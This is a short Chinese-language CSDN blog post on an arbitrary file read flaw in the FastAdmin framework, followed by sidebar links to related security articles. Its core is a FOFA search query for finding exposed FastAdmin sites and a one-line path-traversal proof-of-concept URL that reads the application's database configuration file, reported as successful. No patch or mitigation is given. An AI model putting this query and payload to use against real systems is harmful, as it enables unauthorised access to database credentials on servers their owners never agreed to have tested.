Fastadmin 前台任意文件读取漏洞

于 2024-09-28 16:51:36 发布
阅读量34 收藏
点赞数
文章标签: 服务器 安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/142617970
版权

漏洞描述

FastAdmin是一个基于ThinkPHP5和Bootstrap的后台开发框架,支持权限管理、响应式开发、多语言、模块化开发、CRUD和自由可扩展等功能。

漏洞复现

FOFA

body="fastadmin.net" || body="<h1>fastadmin</h1>" && title="fastadmin"

POC

IP+/index/ajax/lang?lang=../../application/database

 

成功读取数据库文件

 

马船长
关注
[红日安全]Web安全Day5 - 任意文件上传实战攻防
hongrisec的博客
02-26 1251
本文由红日安全成员: MisakiKata 编写,如有不当,还望斧正。 大家好,我们是红日安全-Web安全攻防小组。此项目是关于Web安全的系列文章分享,还包含一个HTB靶场供大家练习,我们给这个项目起了一个名字叫 Web安全实战 ,希望对想要学习Web安全的朋友们有所帮助。每一篇文章都是于基于漏洞简介-漏洞原理-漏洞危害-测试方法(手工测试,工具测试)-靶场测试(分为PHP靶场、JAVA靶场、P...
漏洞预警】FastAdmin框架任意文件读取漏洞
晚风不及你
06-11 2493
FastAdmin是一个基于ThinkPHP和Bootstrap的快速开发的后台管理系统框架。FastAdmin框架存在文件读取漏洞漏洞,攻击者利用此漏洞可以获取系统敏感信息。
2020HW漏洞总结(一)
weixin_45358803的博客
11-27 2584
9月11日-9月23日漏洞(来自补天) 1.深信服EDR某处命令执行漏洞,危害级别:危急 2.深信服SSL VPN 远程代码执行漏洞,危害级别:危急 3.绿盟UTS综合威胁探针信息泄露漏洞,危害级别:危急,官方已发布补丁 4.Apache DolphinScheduler远程代码执行漏洞(CVE-2020-11974),危害级别:危急,官方已发布补丁 5.Apache Cocoon security vulnerability (CVE-2020-11991),危害级别:危急,官方已发布补丁 6.天融信To
2020HW漏洞总结(三)
weixin_45358803的博客
09-27 7449
来自IDLab整理的漏洞详情 01.联软任意文件上传漏洞 • 已知存在漏洞的url如下: http://IP:80/uai/newDevRegist/updateDevUploadinfo.htm(只有201904-1SP起才存在该漏洞)http://IP:80/uai/download/uploadfileToPath.htm(受影响的版本都存在该漏洞)http://IP:80/uai/newDevRegist/newDevRegist/newDevRegist/…;/…;/updateDevUploa
web服务器、中间件和他们的漏洞
Fiverya的博客
01-12 1110
Apache、Nginx、IIS服务器、Tomcat服务及其漏洞介绍
红队攻防文库
若把此心以学道,即身成佛有何难
08-23 470
各家兴便是天下大同
Appcms漏洞+webshell复习
Grey的博客
07-08 8555
0x01 背景由若水师傅提供的一个素材,想要复现CNVD上披露的一个APPCMS的漏洞,由CNVD上的描述可以知道存在漏洞的地方是comment.php这个文件,然后就没有详细的漏洞信息了,所以就需要分析相应的源码文件找出存在漏洞的点。借这个素材捡起下代码审计的各种感觉。期待一起学习,期待和师傅们各种交流讨论。 官方站点:http://www.appcms.cc/ 漏洞详情地址:http://ww...
Notes Fifteenth Day-渗透攻击-红队-内部信息搜集
qq_34801745的博客
10-01 1万+
** Notes Fifteenth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-10-1 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更
Notes Ninth Day-渗透攻击-红队-打入内网
qq_34801745的博客
09-25 1万+
** Notes Ninth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-09-25 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好的继
20年时候收集的一些信息安全岗面试题
课嗨教育的专栏
05-02 7704
目录 面试一 面试二 面试三 更多资料可:渗透测试基础课-课程进度_课嗨教育的博客-CSDN博客 面试一 个人介绍: 自我介绍要点:不要用长逻辑句,短小精悍 控制在3-4分钟 1、自我介绍姓名年龄哪里人学校情况不是重点,作为顺滑开场 2、经历与技能啥时候开始学web攻防,实习经历(神舟,做了什么;尚然,做了什么),让人家清楚历史引入技术主题,挑重点 3、业绩/成绩: 研究类:freebuff SRC I春秋...
Ubuntu完全教程,让你成为Ubuntu高手
热门推荐
翻肚鱼儿的博客
02-07 2万+
Ubuntu的发音 Ubuntu,源于非洲祖鲁人和科萨人的语言,发作 oo-boon-too 的音。了解发音是有意义的,您不是第一个为此困惑的人,当然,也不会是最后一个:)大多数的美国人读 ubuntu 时,将 u 作为元音发音,类似单词 who 或者 boo ,重音在第二个音节即 u'buntu ,oo-boon-too 。如果您喜欢撒哈拉,喜欢它令人窒息的温柔、梦幻般的寂寥还有张扬恣肆的旷远,您大可在第一个 u,后面带些嗡嗡声: oom-boon-too。Ubuntu的中文发音大约为: 乌班图 1.
linux笔记
roarrabbit的博客
10-29 3094
导 2020/3/10 Linux操作系统是UNIX操作系统的一种克隆系统,它诞生于1991 年的10 月5 日(这是第一次正式向外公布的时间)。以后借助于Internet网络,并通过全世界各地计算机爱好者的共同努力,已成为今天世界上使用最多的一种UNIX 类操作系统,并且使用人数还在迅猛增长。 Linux是一套免费使用和自由传播的类Unix操作系统,是一个基于POSIX和UNIX的多用户、多任...
CUMT平台的部分题解
0verWatch的博客
11-30 3168
前言 最近在上网路安全实验课程的时候,其中一个任务就是完成这里面的题目,我还是记录一下吧(还没做完,持续更新) basic部分 decode 这个题目下载之后是一个压缩包,但是里面什么东西也没有,于是放进HXD里面查看是否有其他的东西,打开发现十六进制编码,用Hackbar解码得到flag 白驹过隙 题目的意思是说快,打开页面就会发现错过了flag之类的操作,肯定是存在跳转,老题目要么就抓包,...
统信服务器操作系统【Cron定时任务服务】
RZer的博客
09-23 1186
Cron定时任务服务服务介绍、服务管理、服务配置
IPEmotion 2024 R2现支持Amazon S3和Windows SMB服务器
WINDHILL风丘科技
09-27 319
新版IPEmotion 2024 R2软件推出了许多新功能,其中的一大功能是支持Amazon S3、Windows SMB服务器以及新的IPE-CAM-007 USB摄像头。IPEmotion 2024 R2还支持直接写入TEDS数据和配置可装载电池的新款IPE833记录仪。
使用docker创建zabbix服务器
a15864923744的博客
09-20 834
这几个容器创建后是UP状态就可以使用浏览器尝试访问 http://宿主机IP:8080,期间遇到问题是MySQL容器使用mysql:9.0镜像总是出错,所以用了mysql:8.0。zabbix默认账号密码是:Admin/zabbix。#创建zabbix后端服务容器。#创建zabbix前端服务容器。#创建MySQL容器。
服务器被挂马,导致网站首页被更改怎么解决
最新发布
KookeeyLena7的博客
09-27 697
服务器被挂马并导致网站首页被篡改时,说明服务器或网站的安全性遭到破坏。
Linux常用命令
wang_san_sui_的博客
09-23 947
Linux 系统提供了大量的命令来管理系统和处理文件。:创建新文件或更新现有文件的时间戳。:报告文件系统的磁盘空间使用情况。:查看当前正在运行的进程的状态。:从排序好的文件中删除重复行。:显示系统中正在运行的进程。:安全地复制文件到远程机器。:打印当前工作目录的路径。:移动或重命名文件/目录。:更改文件或目录的所有者。:更改文件或目录的权限。:在文件系统中查找文件。:安全地登录到远程机器。:模式扫描和处理语言。:对文件内容进行排序。:查看文件的开始部分。:查看文件的结束部分。:检查磁盘使用情况。
Jenkins 任意文件读取漏洞
07-12
Jenkins是一个流行的开源持续集成工具,它允许自动化软件构建、测试和部署过程。然而,在某些版本中存在一个已知的安全漏洞,通常称为“Jenkins任意文件读取漏洞”或CVE-2021-22073。这个漏洞发生在jenkins主控台插件管理功能中,攻击者如果能够利用该漏洞,可以构造恶意请求,导致Jenkins服务器从远程或本地文件系统读取未经授权的文件漏洞的原理是由于插件管理界面的一个设计缺陷,使得恶意用户可以构造URL包含通配符或其他路径解析符号,进而获取到敏感文件。这种漏洞未经授权的访问权限可能会泄露敏感信息,如配置文件、源代码甚至用户的私有数据。 为了修复这个问题,Jenkins社区会发布安全更新,并建议受影响的用户尽快升级到最新版本,禁用不受信任的插件,或者配置适当的文件系统权限策略来限制对文件的访问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值